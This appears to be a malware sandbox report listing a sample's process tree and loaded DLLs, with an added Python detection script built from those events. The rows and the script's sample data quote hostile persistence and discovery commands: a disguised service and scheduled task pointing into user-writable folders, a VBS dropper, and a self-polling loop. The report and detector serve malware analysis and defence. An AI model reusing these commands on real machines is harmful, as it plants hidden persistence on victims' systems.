      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
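The process tree above is the raw material for a detection: host discovery via systeminfo and tasklist piped into find, a service whose binPath sits in the user's Startup folder, a VBS dropper under AppData, a six-minute scheduled task pointing at a .bat, and a tasklist/find/timeout loop that polls every 15 seconds for the sample's own image name. The block below is an added example and not part of the Joe Sandbox report: it encodes those observations as rules over (parent image, child image, command line) events, the fields a Sysmon Event ID 1 or Security 4688 feed supplies. The events are constructed from the rows above; the rule names, the user-writable path list and the three-round loop threshold are this example's own choices. The rules are written generally (any service, task or script-host target under a user-writable path, any parent that repeats the polling triple), so they cover more than the names seen in this report.

```python
"""Process-creation rules derived from the sandbox process tree (added example).

Each event is (parent_image, child_image, command_line). The EVENTS list is
constructed from the report's rows; rule names and thresholds are our own.
"""
import re
from collections import Counter

# Constructed sample events, modelled on the "Process created" rows above.
EVENTS = [
    (r"C:\Users\user\Desktop\xKvkNk9SXR.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\sc.exe",
     r'sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\schtasks.exe",
     r'''schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f'''),
] + [
    # Three rounds of the timeout/tasklist/find polling loop under one cmd.exe parent.
    (r"C:\Windows\SysWOW64\cmd.exe", child, cmdline)
    for _ in range(3)
    for child, cmdline in (
        (r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 15 /nobreak"),
        (r"C:\Windows\SysWOW64\tasklist.exe", 'tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv'),
        (r"C:\Windows\SysWOW64\find.exe", 'find /I "xKvkNk9SXR.exe"'),
    )
]

# Locations a standard user can write to; a service or task target there is suspicious.
# (Assumed list for this example; tune it to your estate.)
USER_WRITABLE = re.compile(
    r"\\(AppData|Users\\[^\\]+\\Downloads|Documents and Settings|ProgramData|Temp)\\", re.I)
# A drive-letter path ending in an executable or script extension, optionally quoted.
TARGET_PATH = re.compile(r"[\"']?([A-Za-z]:\\[^\"']+?\.(?:exe|bat|cmd|vbs|js|ps1))[\"']?", re.I)
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def target_paths(cmdline):
    """Every executable/script path argument found in a command line."""
    return TARGET_PATH.findall(cmdline)


def check_event(parent, child, cmdline):
    """Per-event rules; returns a list of (rule_name, detail)."""
    hits = []
    name, cl = basename(child), cmdline.lower()
    if name == "sc.exe" and " create " in cl and "binpath=" in cl:
        for p in target_paths(cmdline):
            if USER_WRITABLE.search(p):
                hits.append(("service_binpath_user_writable", p))
    if name == "schtasks.exe" and "/create" in cl:
        interval = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cl)
        for p in target_paths(cmdline):
            if USER_WRITABLE.search(p) and p.lower().endswith(SCRIPT_EXT):
                detail = p if interval is None else f"{p} every {interval.group(1)} min"
                hits.append(("schtask_script_user_writable", detail))
    if name in ("wscript.exe", "cscript.exe"):
        for p in target_paths(cmdline):
            if USER_WRITABLE.search(p) and p.lower().endswith((".vbs", ".js")):
                hits.append(("script_host_from_user_writable", p))
    if name == "cmd.exe" and "|" in cl and "find" in cl and re.search(r"\b(systeminfo|tasklist)\b", cl):
        hits.append(("discovery_pipeline", cmdline))
    return hits


POLL_TRIPLE = ("tasklist.exe", "find.exe", "timeout.exe")


def check_watchdog(events, min_rounds=3):
    """Flag any parent that spawns tasklist, find and timeout at least min_rounds times each."""
    per_parent = {}
    for parent, child, _ in events:
        if basename(child) in POLL_TRIPLE:
            per_parent.setdefault(parent, Counter())[basename(child)] += 1
    return [("watchdog_loop", parent) for parent, c in per_parent.items()
            if all(c[n] >= min_rounds for n in POLL_TRIPLE)]


def detect(events):
    hits = []
    for ev in events:
        hits.extend(check_event(*ev))
    hits.extend(check_watchdog(events))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

Run as is, the script reports five findings: the service in the Startup folder, the scheduled task (with its 6-minute interval), the VBS launched from AppData, the systeminfo|find discovery pipeline and the polling loop. The per-event rules are stateless and map directly onto a SIEM query; the watchdog rule needs the per-parent counter, so in production it is a sliding-window aggregation keyed on parent process GUID rather than image path.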
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
